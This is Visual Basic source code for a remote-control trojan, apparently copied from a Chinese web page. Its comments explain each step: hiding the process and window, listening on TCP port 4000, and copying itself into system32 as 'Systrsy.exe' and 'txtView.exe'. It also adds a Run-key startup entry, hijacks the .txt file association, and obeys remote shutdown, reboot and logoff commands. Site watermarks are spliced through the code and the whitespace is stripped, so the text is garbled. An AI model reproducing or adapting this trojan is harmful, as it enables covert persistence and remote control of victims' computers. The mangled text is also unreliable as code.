PrivateSubForm_Load()
´隐藏进程
´
´读取主机IP
HostIP=G_Server.LocalIP
´读取主机名
HostName=G_Server.LocalHostName
WithMe
´设置本地默认端口
.G_Server.LocalPort=4000
´监听
.G_Server.Listen
´隐藏窗体
.Hide
EndWith 财软联 盟 fs119.net

´获取木马所在目录
DimsCurrentPathAsString
sCurrentPath=App.Path&"\"&App.EXEName&".exe"
Debug.PrintsCurrentPath

DimsSystemDirAsString
sSystemDir="C:\winnt\system32"
OnErrorResumeNext

´复制文件成系统目录下的Systrsy.exe
FileCopysCurrentPath,sSystemDir&"\Systrsy.exe"
OnErrorResumeNext

´复制文件成系统目录下的txtView.exe
FileCopysCurrentPath,sSystemDir&"\txtView.exe"

´调用
CallStartupGroup
CallWriteToTxt 财,软联盟,fs119.net

´判断程序是否下在运行
IfApp.PrevInstanceThen
´如果已经运行就退出。
End
EndIf
EndSub 财.管家园.fs119.net

PrivateSubG_Server_ConnectionRequest(ByValrequestIDAsLong)
WithMe
If.G_Server.State<>sckClosedThenG_Server.Close
.G_Server.AcceptrequestID
EndWith
EndSub

财管家.园.fs119.net

PrivateSubG_Server_DataArrival(ByValbytesTotalAsLong)
DimstrDataAsString
WithMe
´接收客户请求的信息
.G_Server.GetDatastrData
SelectCasestrData
Case"Exit"
´关机
CallExitWindowsEx(EWX_SHUTDOWN,0)
Case"Reboot"
´重启
CallExitWindowsEx(EWX_REBOOT,0)
Case"Logoff"
´注销
CallExitWindowsEx(EWX_LOGOFF,0)
EndSelect
EndWith
EndSub 财 软联盟 fs119.net

´modApi模块

财软联.盟.fs119.net

´声明全局变量
PublicHostIPAsVariant
PublicHostNameAsVariant
´声明API函数
PublicDeclareFunctionExitWindowsExLib"user32"(ByValuFlagsAsLong,_
ByValdwReservedAsLong)_
AsLong
PublicConstEWX_LOGOFF=0
PublicConstEWX_REBOOT=2
PublicConstEWX_SHUTDOWN=1
PublicDeclareFunctionClipCursorLib"user32"(lpRectAsAny)AsLong
PublicTypeRECT
LeftAsLong
TopAsLong
RightAsLong
BottomAsLong
EndType
PublicDeclareFunctionRegOpenKeyLib"advapi32.dll"Alias"RegOpenKeyA"(ByValhKeyAsLong,_
ByVallpSubKeyAsString,_
phkResultAsLong)_
AsLong
PublicDeclareFunctionRegSetvalueExLib"advapi32.dll"Alias"RegSetvalueExA"(ByValhKeyAsLong,_
ByVallpvalueNameAsString,_
ByValReservedAsLong,_
ByValdwTypeAsLong,_
lpDataAsAny,_
ByValcbDataAsLong)_
AsLong
PublicDeclareFunctionRegCreateKeyLib"advapi32.dll"Alias"RegCreateKeyA"(ByValhKeyAsLong,_
ByVallpSubKeyAsString,_
phkResultAsLong)_
AsLong
PublicConstREG_BINARY=3
PublicConstREG_SZ=1
PublicConstHKEY_LOCAL_MACHINE=&H80000002 财 管家园 fs119.net
PublicConstHKEY_CLASSES_ROOT=&H80000000

财管家园.fs119.net

DeclareSubkeybd_eventLib"user32"(ByValbVkAsByte,_
ByValbScanAsByte,_
ByValdwFlagsAsLong,_
ByValdwExtraInfoAsLong) 财管,家园,fs119.net

´写到注册表启动组中的过程
PublicSubStartupGroup()
DimskeyAsString
DimresultAsLong
DimhKeyIDAsLong
DimskeyValAsString
´启动组中的键,找一个与系统文件相近的。
skey="Systrsy"
´木马文件的路径，可以用GetSystemDirectory来取得系统路径。
skeyVal="C:\winnt\system32\systrsy.exe"
result=RegOpenKey(HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run",hKeyID)
Ifresult=0Then
Debug.PrinthKeyID&"/n"
result=RegSetvalueEx(hKeyID,skey,0&,REG_SZ,skeyVal,Len(skey)1)
Debug.Printresult&"/n"
EndIf
EndSub

财管家 园 fs119.net

´与txt文件进行关联
PublicSubWriteToTxt()
DimresultAsLong
DimhKeyIDAsLong
DimskeyAsString
DimskeyValAsString
skey="txtfile\shell\open\command"
skeyVal="C:\windows\system\txtView.exe"
result=RegOpenKey(HKEY_CLASSES_ROOT,skeyVal,hKeyID)
Ifresult=0Then
Debug.PrinthKeyID&"/n"
result=RegSetvalueEx(hKeyID,skey,0&,REG_SZ,skeyVal,Len(skeyVal)1)
Debug.Printresult
EndIf

财软联盟,fs119.net

EndSub

财管家园,fs119.net

财软,联盟,fs119.net